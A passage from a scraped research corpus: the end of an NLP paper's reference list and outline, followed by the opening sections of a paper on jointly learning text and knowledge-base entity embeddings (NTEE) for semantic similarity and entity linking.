Andrew M. Dai and Quoc V. Le. 2015. Semi- supervised sequence learning. In Advances in Neural Information Processing Systems (NIPS), pages 3079–3087. Zihang Dai, Zhilin Yang, Yiming Yang, William W. Cohen, Jaime Carbonell, Quoc V. Le, and Ruslan Salakhutdinov. 2019. Transformer-XL: Attentive language models beyond a fixed- length context. In Association for Computa- tional Linguistics (ACL). Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre-training of deep bidirectional transformers for language understanding. In North American Association for Computational Linguistics (NAACL). William B. Dolan and Chris Brockett. 2005. Automatically constructing a corpus of sen- tential paraphrases. In Proceedings of the Inter- national Workshop on Paraphrasing. Li Dong, Nan Yang, Wenhui Wang, Furu Wei, Xiaodong Liu, Yu Wang, Jianfeng Gao, Ming Zhou, and Hsiao-Wuen Hon. 2019. Unified language model pre-training for natural lan- guage understanding and generation. In Ad- vances in Neural Information Processing Systems (NIPS). Matthew Dunn, Levent Sagun, Mike Higgins, V. Ugur Guney, Volkan Cirik, and Kyunghyun Cho. 2017. SearchQA: A new Q&A dataset augmented with context from a search engine. arXiv preprint arXiv:1704.05179. Adam Fisch, Alon Talmor, Robin Jia, Minjoon Seo, Eunsol Choi, and Danqi Chen. 2019. MRQA 2019 shared task: Evaluating general- ization in reading comprehension. In Proceed- ings of 2nd Machine Reading for Reading Comprehension (MRQA) Workshop at EMNLP. Danilo Giampiccolo, Bernardo Magnini, Ido Dagan, and Bill Dolan. 2007. The third PASCAL recognizing textual entailment challenge. In Pro- ceedings of the ACL-PASCAL Workshop on Tex- tual Entailment and Paraphrasing, pages 1–9. Luheng He, Kenton Lee, Omer Levy, and Luke Zettlemoyer. 2018. Jointly predicting predicates and arguments in neural semantic role labeling. In Association for Computational Linguistics (ACL), pages 364–369. Dan Hendrycks and Kevin Gimpel. 2016. Gaussian error linear units (gelus). arXiv pre- print arXiv:1606.08415. Matthew Honnibal and Ines Montani. 2017. spaCy 2: Natural language understanding with Bloom embeddings, convolutional neural networks and incremental parsing. To appear. Jeremy Howard and Sebastian Ruder. 2018. Uni- versal language model fine-tuning for text clas- sification. arXiv preprint arXiv:1801.06146. 74 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 Mandar Joshi, Eunsol Choi, Omer Levy, Daniel Weld, and Luke Zettlemoyer. 2019a. pair2vec: Compositional word-pair embeddings for cross-sentence inference. In North American Association for Computational Linguistics (NAACL), pages 3597–3608. Mandar Joshi, Eunsol Choi, Daniel Weld, and Luke Zettlemoyer. 2017. TriviaQA: A large scale distantly supervised challenge dataset for reading comprehension. In Association for Com- putational Linguistics (ACL), pages 1601–1611. Mandar Joshi, Omer Levy, Daniel S. Weld, Luke Zettlemoyer, and Omer Levy. 2019b. BERT for coreference resolution: Baselines and analysis. In Empirical Methods in Natural Language Processing (EMNLP). Diederik Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Inter- national Conference on Learning Representa- tions (ICLR). Ryan Kiros, Yukun Zhu, Ruslan R. Salakhutdinov, Richard S. Zemel, Antonio Torralba, Raquel Urtasun, and Sanja Fidler. 2015. Skip-thought vectors. In Advances in Neural Information Processing Systems (NIPS). Tom Kwiatkowski, Jennimaria Palomaki, Olivia Redfield, Michael Collins, Ankur Parikh, Chris Alberti, Danielle Epstein, Illia Polosukhin, Matthew Kelcey, Jacob Devlin, Kenton Lee, Kristina N. Toutanova, Llion Jones, Ming- Wei Chang, Andrew Dai, Jakob Uszkoreit, Quoc Le, and Slav Petrov. 2019. Natural questions: A benchmark for question answering research. Transactions of the Association of Computational Linguistics (TACL). Guillaume Lample and Alexis Conneau. 2019. Cross-lingual language model pretraining. Advances in Neural Information Processing Systems (NIPS). Kenton Lee, Luheng He, Mike Lewis, and Luke Zettlemoyer. 2017. End-to-end neural coreference resolution. In Empirical Methods in Natural Language Processing (EMNLP), pages 188–197. Kenton Lee, Luheng He, and Luke Zettlemoyer. 2018. Higher-order coreference resolution with coarse-to-fine inference. In North American Association for Computational Linguistics (NAACL), pages 687–692. Kenton Lee, Shimi Salant, Tom Kwiatkowski, Ankur Parikh, Dipanjan Das, and Jonathan Berant. 2016. Learning recurrent span repre- sentations for extractive question answering. arXiv preprint arXiv:1611.01436. Hector J. Levesque, Ernest Davis, and Leora Morgenstern. 2011. The Winograd schema challenge. In AAAI Spring Symposium: Logical Formalizations of Commonsense Reasoning, volume 46, page 47. Xiaodong Liu, Pengcheng He, Weizhu Chen, and Jianfeng Gao. 2019a. Multi-task deep neural networks for natural language understanding. In Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. As- sociation for Computational Linguistics (ACL). Yinhan Liu, Myle Ott, Naman Goyal, Jingfei Du, Mandar Joshi, Danqi Chen, Omer Levy, Mike Lewis, Luke Zettlemoyer, and Veselin Stoyanov. 2019b. RoBERTa: A robustly opti- mized BERT pretraining approach. arxiv pre- print arXiv:1907.11692. Lajanugen Logeswaran and Honglak Lee. 2018. An efficient framework for learning sentence representations. arxiv preprint arXiv:1803.02893. Ilya Loshchilov and Frank Hutter. 2019. Decou- pled weight decay regularization. In Interna- tional Conference on Learning Representations (ICLR). Oren Melamud, Jacob Goldberger, and Ido Dagan. 2016. context2vec: Learning generic context embedding with bidirectional LSTM. In Com- putational Natural Language Learning (CoNLL), pages 51–61. Myle Ott, Sergey Edunov, Alexei Baevski, Angela Fan, Sam Gross, Nathan Ng, David Grangier, and Michael Auli. 2019. fairseq: A fast, exten- sible toolkit for sequence modeling. In North American Association for Computational Lin- guistics (NAACL), pages 48–53. Matthew Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, 75 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 and Luke Zettlemoyer. 2018. Deep contextual- ized word representations. In North American Association for Computational Linguistics (NAACL), pages 2227–2237. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Olga Uryupina, and Yuchen Zhang. 2012. CoNLL-2012 shared task: Modeling multi- lingual unrestricted coreference in ontonotes. In Joint Conference on EMNLP and CoNLL- Shared Task, pages 1–40. Ofir Press and Lior Wolf. 2017. Using the out- put embedding to improve language models. In Proceedings of the 15th Conference of the European Chapter of the Association for Com- putational Linguistics: Volume 2, Short Papers, pages 157–163. Association for Computational Linguistics (ACL). Alec Radford, Karthik Narasimhan, Time Salimans, and Ilya Sutskever. 2018. Improving language un- derstanding with unsupervised learning, OpenAI. Pranav Rajpurkar, Robin Jia, and Percy Liang. 2018. Know what you don’t know: Unanswer- able questions for SQuAD. In Association for Computational Linguistics (ACL), pages 784–789. Pranav Rajpurkar, Jian Zhang, Konstantin Lopyrev, and Percy Liang. 2016. SQuAD: 100,000+ questions for machine comprehension of text. In Empirical Methods in Natural Language Processing (EMNLP), pages 2383–2392. Livio Baldini Soares, Nicholas Arthur FitzGerald, Jeffrey Ling, and Tom Kwiatkowski. 2019. Matching the blanks: Distributional similarity for relation learning. In Association for Compu- tational Linguistics (ACL), pages 2895–2905. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Ng, and Christopher Potts. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In Empirical Methods in Natural Language Processing (EMNLP), pages 1631–1642. Kaitao Song, Xu Tan, Tao Qin, Jianfeng Lu, and Tie-Yan Liu. 2019. MASS: Masked se- quence to sequence pre-training for language generation. In International Conference on Machine Learning (ICML), pages 5926–5936. Mitchell Stern, Noam Shazeer, and Jakob Uszkoreit. 2018. Blockwise parallel decod- ing for deep autoregressive models. In Advances in Neural Information Processing Systems (NIPS). Yu Stephanie Sun, Shuohuan Wang, Yukun Li, Shikun Feng, Xuyi Chen, Han Zhang, Xinlun Tian, Danxiang Zhu, Hao Tian, and Hua Wu. 2019. ERNIE: Enhanced representation through knowledge integration. arXiv preprint arXiv:1904.09223. Adam Trischler, Tong Wang, Xingdi Yuan, Justin Harris, Alessandro Sordoni, Philip Bachman, and Kaheer Suleman. 2017. NewsQA: A ma- chine comprehension dataset. In 2nd Work- shop on Representation Learning for NLP, pages 191–200. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Łukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information Processing Systems (NIPS). Alex Wang, Amapreet Singh, Julian Michael, Felix Hill, Omer Levy, and Samuel R. Bowman. 2019. GLUE: A multi-task benchmark and anal- ysis platform for natural language understand- ing. In International Conference on Learning Representations (ICLR). Alex Warstadt, Amanpreet Singh, and Samuel R. Bowman. 2018. Neural network acceptability judgments. arXiv preprint arXiv:1805.12471. Adina Williams, Nikita Nangia, and Samuel Bowman. 2018. A broad-coverage challenge corpus for sentence understanding through in- ference. In North American Association for Com- putational Linguistics (NAACL), pages 1112–1122. Thomas Wolf, Lysandre Debut, Victor Sanh, Julien Chaumond, Clement Delangue, Anthony Moi, Pierric Cistac, Tim Rault, R’emi Louf, Morgan Funtowicz, and Jamie Brew. 2019. HuggingFace’s Transformers: State-of-the-art natural language processing. arXiv preprint arXiv:1910.03771. Zhilin Yang, Zihang Dai, Yiming Yang, Jaime Carbonell, Ruslan Salakhutdinov, and Quoc V. Le. 2019. XLNet: Generalized autoregressive 76 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 pretraining for language understanding. In Advances in Neural Information Processing Systems (NeurIPS). Zhilin Yang, Peng Qi, Saizheng Zhang, Yoshua Bengio, William Cohen, Ruslan Salakhutdinov, and Christopher D. Manning. 2018. HotpotQA: A dataset for diverse, explainable multi-hop question answering. In Empirical Methods in Natural Language Processing (EMNLP), pages 2369–2380. Yuhao Zhang, Victor Zhong, Danqi Chen, Gabor Angeli, and Christopher D. Manning. 2017. Position-aware attention and supervised data improve slot filling. In Empirical Methods in Natural Language Processing (EMNLP), pages 35–45. Zhengyan Zhang, Xu Han, Zhiyuan Liu, Xin Jiang, Maosong Sun, and Qun Liu. 2019. ERNIE: Enhanced language representation with informative entities. In Association for Compu- tational Linguistics (ACL), pages 1441–1451. 77 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 Introduction Background: BERT Model Span Masking Span Boundary Objective Single-Sequence Training Experimental Setup Tasks Implementation Baselines Results Per-Task Results Overall Trends Ablation Studies Masking Schemes Auxiliary Objectives Related Work Conclusion Appendices Pre-training Procedure Fine-tuning Hyperparameters work_waeoeckza5hvjfqri65tyffi54 ---- Learning Distributed Representations of Texts and Entities from Knowledge Base Ikuya Yamada1,4 Hiroyuki Shindo2 Hideaki Takeda3 Yoshiyasu Takefuji4 ikuya@ousia.jp shindo@is.naist.jp takeda@nii.ac.jp takefuji@sfc.keio.ac.jp 1 Studio Ousia, Japan, 2 Nara Institute of Science and Technology, Japan 3 National Institute of Informatics, Japan, 4 Keio University, Japan Abstract We describe a neural network model that jointly learns distributed representations of texts and knowledge base (KB) entities. Given a text in the KB, we train our proposed model to predict entities that are relevant to the text. Our model is designed to be generic with the ability to address various NLP tasks with ease. We train the model using a large cor- pus of texts and their entity annotations ex- tracted from Wikipedia. We evaluated the model on three important NLP tasks (i.e., sen- tence textual similarity, entity linking, and fac- toid question answering) involving both unsu- pervised and supervised settings. As a result, we achieved state-of-the-art results on all three of these tasks. Our code and trained models are publicly available for further academic re- search.1 1 Introduction Methods capable of learning distributed representa- tions of arbitrary-length texts (i.e., fixed-length con- tinuous vectors that encode the semantics of texts), such as sentences and paragraphs, have recently attracted considerable attention (Le and Mikolov, 2014; Kiros et al., 2015; Li et al., 2015; Wieting et al., 2016; Hill et al., 2016b; Kenter et al., 2016). These methods aim to learn generic representations that are useful across domains similar to word em- bedding methods such as Word2vec (Mikolov et al., 2013b) and GloVe (Pennington et al., 2014). Another interesting approach is learning dis- tributed representations of entities in a knowledge 1https://github.com/studio-ousia/ntee base (KB) such as Wikipedia and Freebase. These methods encode information of entities in the KB into a continuous vector space. They are shown to be effective for various KB-related tasks such as en- tity search (Hu et al., 2015), entity linking (Hu et al., 2015; Yamada et al., 2016), and link prediction (Bordes et al., 2013; Wang et al., 2014; Lin et al., 2015). In this paper, we describe a novel method to bridge these two different approaches. In particular, we propose Neural Text-Entity Encoder (NTEE), a neural network model to jointly learn distributed representations of texts (i.e., sentences and para- graphs) and KB entities. For every text in the KB, our model aims to predict its relevant entities, and places the text and the relevant entities close to each other in a continuous vector space. We use human- edited entity annotations obtained from Wikipedia (see Table 1) as supervised data of relevant entities to the texts containing these annotations.2 Note that, KB entities have been conventionally used to model semantics of texts. A representa- tive example is Explicit Semantic Analysis (ESA) (Gabrilovich and Markovitch, 2007), which repre- sents the semantics of a text using a sparse vector space, where each dimension corresponds to the rel- evance score of the text to each entity. Essentially, ESA shows that text can be accurately represented using a small set of its relevant entities. Based on 2Entity annotations in Wikipedia can be viewed as su- pervised data of relevant entities because Wikipedia instructs its contributors to create annotations only where they are relevant in its manual: https://en.wikipedia.org/ wiki/Wikipedia:Manual_of_Style 397 Transactions of the Association for Computational Linguistics, vol. 5, pp. 397–411, 2017. Action Editor: Kristina Toutanova . Submission batch: 12/2016; Revision batch: 3/2017; Published 11/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. this fact, we hypothesize that we can use the anno- tations of relevant entities as the supervised data of learning text representations. Furthermore, we also consider that placing texts and entities into the same vector space enables us to easily compute the simi- larity between texts and entities, which can be bene- ficial for various KB-related tasks. In order to test this hypothesis, we conduct three experiments involving both the unsupervised and the supervised tasks. First, we use standard semantic textual similarity datasets to evaluate the quality of the learned text representations of our method in an unsupervised fashion. As a result, our method clearly outperformed the state-of-the-art methods. Furthermore, to test the effectiveness of our method to perform KB-related tasks, we address the following two important problems in the super- vised setting: entity linking (EL) and factoid ques- tion answering (QA). In both tasks, we adopt a sim- ple multi-layer perceptron (MLP) classifier with the learned representations as features. We tested our method using two standard datasets (i.e., CoNLL 2003 and TAC 2010) for the EL task and a popular factoid QA dataset based on the quiz bowl quiz game for the factoid QA task. As a result, our method out- performed recent state-of-the-art methods on both the EL and the factoid QA tasks. Additionally, there have also been proposed meth- ods that map words and entities into the same con- tinuous vector space (Wang et al., 2014; Yamada et al., 2016; Fang et al., 2016). Our work differs from these works because we aim to map texts (i.e., sentences and paragraphs) and entities into the same vector space. Our contributions are summarized as follows: • We propose a neural network model that jointly learns vector representations of texts and KB entities. We train the model using a large amount of entity annotations extracted directly from Wikipedia. • We demonstrate that our proposed representa- tions are surprisingly effective for various NLP tasks. In particular, we apply the proposed model to three different NLP tasks, namely se- mantic textual similarity, entity linking, and factoid question answering, and achieve state- of-the-art results on all three tasks. The Lord of the Rings is an epic high-fantasy novel written by English author J. R. R. Tolkien. Entity Annotations: The Lord of the Rings, Epic (genre), High fantasy, J. R. R. Tolkien Table 1: An example of a sentence with entity annota- tions. • We release our code and trained models to the community at https://github.com/ studio-ousia/ntee to facilitate further academic research. 2 Our Approach In this section, we propose our approach of learn- ing distributed representations of texts and entities in KB. 2.1 Model Given a text t (a sequence of words w1, ..., wN ), we train our model to predict entities e1, ..., en that ap- pear in t. Formally, the probability that represents the likelihood of an entity e appearing in t is defined as the following softmax function: P (e|t) = exp(ve >vt)∑ e′∈EKB exp(ve′ >vt) , (1) where EKB is a set of all entities in KB, and ve ∈ Rd and vt ∈ Rd are the vector representations of the entity e and the text t, respectively. We compute vt using the element-wise sum of word vectors in t with L2 normalization and a fully connected layer. Let us denote vs as a vector of the sum of word vectors (vs = ∑N i=1 vwi ), vt is computed as follows: vt = W vs ‖vs‖ + b, (2) where W ∈ Rd×d is a weight matrix, and b ∈ Rd is a bias vector. Here, we initialize vw and ve using the pre-trained representations described in the next section. The loss function of our model is defined as fol- lows: L = − ∑ (t,Et)∈Γ ∑ e∈Et log P (e|t), (3) 398 where Γ denotes a set of pairs each of which consists of a text t and its entity annotations Et in KB. One problem in training our model is that the de- nominator in Eq. (1) is computationally very expen- sive because it involves summation over all entities in KB. We address this problem by replacing EKB in Eq. (1) with E∗, which is the union of the positive entity e and the randomly chosen k negative entities that do not appear in t. This method can be viewed as negative sampling (Mikolov et al., 2013b) with a uniform negative distribution. In addition, because the length of a text t is ar- bitrary in our model, we test the following two set- tings: t as a paragraph, and t as a sentence3. 2.2 Parameters The parameters to be learned by our model are the vector representations of words and entities in our vocabulary V , the weight matrix W , and the bias vector b. Consequently, the total number of parame- ters in our model is |V |×d + d2 + d. We initialize the representations of words and entities using pre-trained representations to reduce the training time. We use the skip-gram model of Word2vec (Mikolov et al., 2013a; Mikolov et al., 2013b) with negative sampling trained with Wikipedia articles. In order to create a corpus for the skip-gram model from Wikipedia, we sim- ply replace the name of each entity annotation in Wikipedia articles with the unique identifier of the entity the annotation refers to. This simple method enables us to easily train the distributed represen- tations of words and entities simultaneously. We used a Wikipedia dump generated in July 20164. For the hyper-parameters of the skip-gram model, we used standard parameters such as the context win- dow size being 10, and the size of negative samples being 5. We used the Python Word2vec implemen- tation in Gensim5. Additionally, the entity represen- tations were normalized to unit length before they were used as the pre-trained representations. 3We use the open-source Apache OpenNLP to detect sen- tences. 4The Wikipedia dump was downloaded from Wikimedia Downloads: https://dumps.wikimedia.org/ 5https://radimrehurek.com/gensim/ 2.3 Corpus We trained our model by using the English DBpe- dia abstract corpus (Brümmer et al., 2016), an open corpus of Wikipedia texts with entity annotations manually created by Wikipedia contributors.6 It was extracted from the first introductory sections of 4.4 million Wikipedia articles. We train our model by iterating over the texts and their entity annotations in the corpus. We used words that appear five times or more and entities that appear three times or more in the cor- pus, and simply ignored the other words and entities. As a result, our vocabulary V consisted of 705,168 words and 957,207 entities. Further, the number of valid words and entity annotations were approxi- mately 382 million and 28 million, respectively. Additionally, we also introduce one heuristic method to generate entity annotations. For each text, we add a pseudo-annotation that points to the entity of which the KB page is the source of the text. Be- cause every KB page describes its corresponding en- tity, it typically contains many mentions referring to the entity. However, because hyper-linking to the web page itself does not make sense, these kinds of mentions cannot be observed as annotations in Wikipedia. Therefore, we use the aforementioned heuristic method to address this problem. 2.4 Other Details Our model has several hyper-parameters. Following Kenter et al. (2016), the number of dimensions we used was d = 300. The mini-batch size was fixed at 100, the size of negative samples k was set to 30, and the training consisted of one epoch. The model was implemented using Python and Theano (Theano Development Team, 2016). The training took approximately six days using a NVIDIA K80 GPU. We trained the model using stochastic gradient descent (SGD) and its learning rate was controlled by RMSprop (Tieleman and Hin- ton, 2012). 6The corpus also includes annotations that are generated us- ing heuristics. We did not use these pseudo-annotations and used only the entity annotations that were created by Wikipedia contributors. 399 3 Experiments In order to evaluate our model presented in the previ- ous section, we conduct experiments on three impor- tant NLP tasks using the representations learned by our model. First, we conduct an experiment on a se- mantic textual similarity task in order to evaluate the quality of the learned text representations. Next, we conduct experiments on two important NLP prob- lems (i.e., EL and factoid QA) in order to test the effectiveness of our proposed representations as fea- tures for downstream NLP tasks. Finally, we further qualitatively analyze the learned representations. Note that we separately describe how we ad- dress each task using our representations in the sub- section of each experiment. 3.1 Semantic Textual Similarity Semantic textual similarity aims to test how well a model reflects human judgments of the semantic similarity between two sentence pairs. The task has been used as a standard method to evaluate the qual- ity of distributed representations of sentences in past work (Kiros et al., 2015; Hill et al., 2016a; Kenter et al., 2016). 3.1.1 Setup Our experimental setup follows that of a previ- ously published experiment (Hill et al., 2016a). We use two standard datasets: (1) the STS 2014 dataset (Agirre et al., 2014) consisting of 3,750 sentence pairs and human ratings from six different sources (e.g., newswire, web forums, dictionary glosses), and (2) the SICK dataset (Marelli et al., 2014) con- sisting of 10,000 pairs of sentences and human rat- ings. In both datasets, the ratings take values be- tween 1 and 5, where a rating of 1 indicates that the sentence pair is not related, and a rating of 5 means that they are highly related. All sentence pairs ex- cept the 500 SICK trial pairs were used for our ex- periments. We train our model by experimenting with both paragraphs and sentences. Further, we introduce another training setting (denoted by fixed NTEE), where the parameters in the word representations and the entity representations are fixed throughout the training. We compute the cosine distance between the vec- tors of the two sentences in each sentence pair (de- rived using Eq. (2)) and measure the Pearson’s r and Spearman’s p correlations between these distances and the gold-standard human ratings. Additionally, we use Pearson’s r as our primal score. 3.1.2 Baselines For baselines for this experiment, we selected the following four recent state-of-the-art models. Brief descriptions of these models are as follows: • Word2vec (Mikolov et al., 2013a; Mikolov et al., 2013b) is a popular word embedding model. We compute a sentence representation by element-wise addition of the vectors of its words (Mitchell and Lapata, 2008). We add its skip-gram and CBOW models to our baselines. We train the model with the hyper-parameters and the Wikipedia corpus explained in Sec- tion 2.2. Thus, the skip-gram model is equiv- alent to the pre-trained representations used in our model. Furthermore, in order to conduct a fair comparison between the skip-gram model and our model, we also add skip-gram (plain), which is a skip-gram model trained using a different corpus. In particular, the corpus is augmented using the texts in DBpedia abstract corpus7, and its entity annotations are treated as regular text phrases (not replaced to their unique identifiers). • Skip-thought (Kiros et al., 2015) is a model that is trained to predict adjacent sentences given each sentence in a corpus. Sentences are encoded using a recurrent neural network (RNN) with gated recurrent units (GRU). • Siamese CBOW (Kenter et al., 2016) is a model that aims to predict sentences occurring next to each other in a corpus. A sentence rep- resentation is derived using a vector average of words in the sentence. We obtain a score of a sentence pair by using the cosine distance between the sentence represen- tations of the pair. 400 Name STS 2014 SICK News Forum OnWN Twitter Images Headlines NTEE (sentence) .74/.68 .56/.55 .72/.74 .75/.66 .82/.77 .69/.63 .71/.60 NTEE (paragraph) .74/.68 .52/.51 .66/.69 .74/.66 .77/.72 .68/.61 .69/.61 Fixed NTEE (sentence) .72/.69 .47/.46 .75/.78 .74/.67 .78/.74 .65/.61 .73/.61 Fixed NTEE (paragraph) .72/.69 .47/.47 .75/.78 .73/.67 .77/.74 .65/.61 .72/.61 Skip-gram .65/.67 .36/.39 .62/.69 .65/.66 .54/.56 .62/.60 .66/.58 Skip-gram (plain) .63/.65 .36/.39 .61/.69 .62/.62 .56/.57 .60/.58 .66/.58 CBOW .58/.59 .35/.36 .57/.64 .70/.68 .54/.55 .57/.53 .61/.58 Skip-thought .45/.44 .15/.14 .34/.39 .43/.42 .60/.55 .44/.43 .60/.57 Siamese CBOW .59/.58 .41/.42 .61/.66 .73/.71 .65/.65 .64/.63 - Table 2: Pearson’s r and Spearman’s p correlations of our models with the state-of-the-art models on semantic textual similarity task. Best scores, in terms of r, are marked in bold. 3.1.3 Results Table 2 shows our experimental results with the baseline methods. We obtained the scores of Skip-thought from Hill et al. (2016a) and those of Siamese CBOW from Kenter et al. (2016). Our NTEE models were able to outperform the state-of-the-art models in all datasets in terms of Pearson’s r. Moreover, our fixed NTEE models outperformed the NTEE models in several datasets and the skip-gram models in all datasets. Further, our model trained with sentences consistently out- performed the model trained with paragraphs. Ad- ditionally, the skip-gram models performed mostly similarly regardless of the difference of their corpus. Note that, because we fix the word representations and the entity representations during the training of the fixed NTEE models, the difference between the fixed NTEE models and the skip-gram model is merely the presence of the learned fully connected layer. Because our model places a text representa- tion and the representations of its relevant entities close to each other, the function of the layer can be recognized as an affine transformation from the word-based text representation to the entity-based text representation. We consider that the reason why the fixed NTEE model performed well among datasets is that the entity-based text representations are more semantic (less syntactic) and contain less noise than the word-based text representations, thus are much more suitable for addressing this task. 7We augment the corpus simply by appending the texts in DBpedia abstract corpus to the Wikipedia corpus. 3.2 Entity Linking Entity Linking (EL) (Cucerzan, 2007; Mihalcea and Csomai, 2007; Milne and Witten, 2008; Ratinov et al., 2011; Hajishirzi et al., 2013; Ling et al., 2015) is the task of resolving ambiguous mentions of enti- ties to their referent entities in KB. EL has recently received considerable attention because of its effec- tiveness in various NLP tasks such as information extraction and semantic search. The task is chal- lenging because of the ambiguity in the meaning of entity mentions (e.g., “Washington” can refer to the state, the capital of the US, the first US president George Washington, and so forth). The key to improve the performance of EL is to accurately model the semantic context of entity mentions. Because our model learns the likelihood of an entity appearance in a given text, it can natu- rally be used for modeling the context of EL. 3.2.1 Setup Our experimental setup follows the setup de- scribed in past work (Chisholm and Hachey, 2015; He et al., 2013; Yamada et al., 2016). We use two standard datasets: the CoNLL dataset and the TAC 2010 dataset. The CoNLL dataset, which was pro- posed in Hoffart et al. (2011), includes training, de- velopment, and test sets consisting of 946, 216, and 231 documents, respectively. We use the training set to train our EL method, and the test set for measur- ing the performance of our method. We report the standard micro- (aggregates over all mentions) and macro- (aggregates over all documents) accuracies of the top-ranked candidate entities. 401 The TAC 2010 dataset is another dataset con- structed for the Text Analysis Conference (TAC)8 (Ji et al., 2010). The dataset comprises training and test sets containing 1,043 and 1,013 documents, re- spectively. We use mentions only with a valid entry in the KB, and report the micro-accuracy score of the top-ranked candidate entities. We evaluate our method on 1,020 mentions contained in the test set. Further, we randomly select 10% of the documents from the training set, and use these documents as a development set. Additionally, we collected two measures that have frequently been used in past EL work: entity popu- larity and prior probability. The entity popularity of an entity e is defined as log(|Ae,∗| + 1), where Ae,∗ is the set of KB anchors that point to e. The prior probability of mention m referring to entity e is defined as |Ae,m|/|A∗,m|, where A∗,m repre- sents all KB anchors with the same surface as m, and Ae,m is a subset of A∗,m that points to e. These two measures were collected directly from the same Wikipedia dump described in Section 2.2. 3.2.2 Our Method Following past work, we address the EL task by solving two sub-tasks: candidate generation and mention disambiguation. Candidate Generation In candidate generation, candidates of referent entities are generated for each mention. We use the candidate generation method proposed in Yamada et al. (2016) for the sake of compatibility with their state-of-the-art results. In particular, we use a public dataset proposed in Per- shina et al. (2015) for the CoNLL dataset. For the TAC 2010 dataset, we use a dictionary that is di- rectly built from the Wikipedia dump explained in Section 2.2. We retrieved possible mention surfaces of an entity from (1) the title of the entity, (2) the ti- tle of another entity redirecting to the entity, and (3) the names of anchors that point to the entity. Fur- thermore, to improve the recall, we also tokenize the title of each entity and treat resulted tokens as pos- sible mention surfaces of the corresponding entity. We sort the entity candidates according to their en- tity popularities, and retain the top 100 candidates for computational efficiency. The recall of the can- 8http://www.nist.gov/tac/ didate generation was 99.9% and 94.6% on the test sets of the CoNLL and TAC 2010 datasets, respec- tively. Mention Disambiguation We address the men- tion disambiguation task using a multi-layer percep- tron (MLP) with a single hidden layer. Figure 1 shows the architecture of our neural network model. The model selects an entity from among the entity candidates for each mention m in a document t. For each entity candidate e, we input the vector of the entity ve9, the vector of the document vt (computed with Eq. (2)), the dot product of ve and vt10,11, and the small number of features for EL described below. On top of these features, we stack a hidden layer with nonlinearity using rectified linear units (ReLU) and dropout. We also add an output layer onto the hidden layer and select the most relevant entity using softmax over the entity candidates. Similar to past work (Chisholm and Hachey, 2015; Yamada et al., 2016), we include a small num- ber of features in our model. First, we use the fol- lowing three standard EL features: the entity popu- larity of e, the prior probability of m referring to e, and the maximum prior probability of e of all men- tions in t. In addition, we optionally add features representing string similarities between the title of e and the surface of m (Meij et al., 2012; Yamada et al., 2016). These similarities include whether the title of e exactly equals or contains the surface of m, and whether the title of e starts or ends with the surface of m. We tuned the following two hyper-parameters us- ing the micro-accuracy on the development set of each dataset: the number of units in the hidden layer and the dropout probability. The results are listed in Table 3. Further, we trained the model by using stochastic gradient descent (SGD). The learning rate was con- trolled by RMSprop, and the mini-batch size was set to 100. We also used the micro-accuracy on the de- velopment set to locate the best epoch for testing. 9We normalized ve to unit length because of its overall higher accuracy. 10Note that, the dot product represents the unnormalized like- lihood that e appears in t (see Eq.(1)). 11We also tested using the cosine similarity rather than the dot product, but it slightly degraded the performance in the EL task and the factoid QA task described below. 402 Figure 1: Architecture of our neural network for EL and QA tasks. We tested the NTEE model and the fixed NTEE model to initialize the parameters of representations vt and ve. Furthermore, we also tested two simple methods using the pre-trained representations (i.e., skip-gram). The first method is that the representa- tions of words and entities are initialized using the pre-trained representations presented in Section 2.2, and the other parameters are initialized randomly (denoted by SG-proj). The second method is the same method as in SG-proj except the training cor- pus of the pre-trained representations is augmented using the DBpedia abstract corpus (denoted by SG- proj-dbp).12 Regarding the NTEE and the fixed NTEE models, sentences (rather than paragraphs) were used to train the proposed representations because of the superior performance of this approach on both the CoNLL and TAC 2010 datasets. Further, we did not update our representations of words (vw) and entities (ve) in the training of our EL method, because updat- ing them did not generally improve the performance. Additionally, we used a vector filled with zeros as representations of entities that were not contained in our vocabulary. 3.2.3 Baselines We adopt the following six recent state-of-the-art EL methods as our baselines: • Hoffart (Hoffart et al., 2011) used a graph- based approach that finds a dense subgraph of entities in a document to address EL. 12We augmented the corpus by simply concatenating the Wikipedia corpus and the DBpedia abstract corpus. Similar to the Wikipedia corpus, we replaced each entity annotation in the DBpedia abstract corpus by its unique identifier of the entity referred by the annotation. Dataset hidden units dropout EL: CoNLL (NTEE) 2,000 0.3 CoNLL (NTEE w/o strsim) 3,000 0.8 CoNLL (Fixed NTEE) 5,000 0.0 CoNLL (SG-proj) 2,000 0.9 CoNLL (SG-proj-dbp) 5,000 0.6 TAC10 (NTEE) 5,000 0.0 TAC10 (NTEE w/o strsim) 5,000 0.0 TAC10 (Fixed NTEE) 5,000 0.0 TAC10 (SG-proj) 2,000 0.4 TAC10 (SG-proj-dbp) 5,000 0.0 Factoid QA: History (NTEE) 1,000 0.4 History (Fixed NTEE) 1,000 0.4 History (SG-proj) 3,000 0.1 History (SG-proj-dbp) 5,000 0.1 Literature (NTEE) 2,000 0.1 Literature (Fixed NTEE) 2,000 0.1 Literature (SG-proj) 2,000 0.1 Literature (SG-proj-dbp) 5,000 0.1 Table 3: Hyper-parameters used for EL and QA tasks. hidden units is the number of units in the hidden layers, and dropout is the dropout probability. • He (He et al., 2013) proposed a method for learning the representations of mention con- texts and entities from KB using the stacked de- noising auto-encoders. These representations were then used to address EL. • Chisholm (Chisholm and Hachey, 2015) used a support vector machine (SVM) with vari- ous features derived from KB and a Wikilinks dataset 